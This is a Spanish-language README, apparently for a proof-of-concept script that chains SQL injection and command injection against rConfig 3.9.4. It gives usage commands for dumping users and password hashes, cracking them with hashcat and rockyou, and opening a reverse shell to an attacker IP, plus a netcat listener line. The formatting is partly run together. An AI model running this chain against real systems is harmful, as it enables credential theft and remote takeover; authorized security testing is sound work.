
PoCs combinados para rConfig: SQL Injection (CVE-2020-10220) & Command Injection (CVE-2020-10879)
Este PoC está dirigido a la versión 3.9.4 de rConfig y demuestra la explotación mediante una combinación de vulnerabilidades de Inyección SQL e Inyección Remota de Comandos. Automatiza el proceso de:
rockyou y las reglas best64.ruleEste script se basa en y combina dos PoCs originales:
Fue modificado para automatizar el descifrado y la obtención opcional de una shell.
requests (pip install requests)hashcat instalado y accesible desde la línea de comandosrockyou.txt (o equivalente) ubicada en /usr/share/wordlists/rockyou.txt/usr/share/hashcat/rules/best64.rulePara volcar usuarios y hashes únicamente:
python3 rConfig_rce.py https://objetivo
Para volcar usuarios, descifrar contraseñas e intentar RCE (requiere IP y puerto del atacante para la reverse shell):
python3 rConfig_rce.py https://objetivo ip_atacante puerto_atacante
admin para la fase de inyección de comandos.nc -lvnp 80) ejecutándose en su máquina atacante para capturar la reverse shell.Esta herramienta está diseñada únicamente para pruebas de seguridad autorizadas y fines educativos. El uso no autorizado contra sistemas sin permiso es ilegal y poco ético.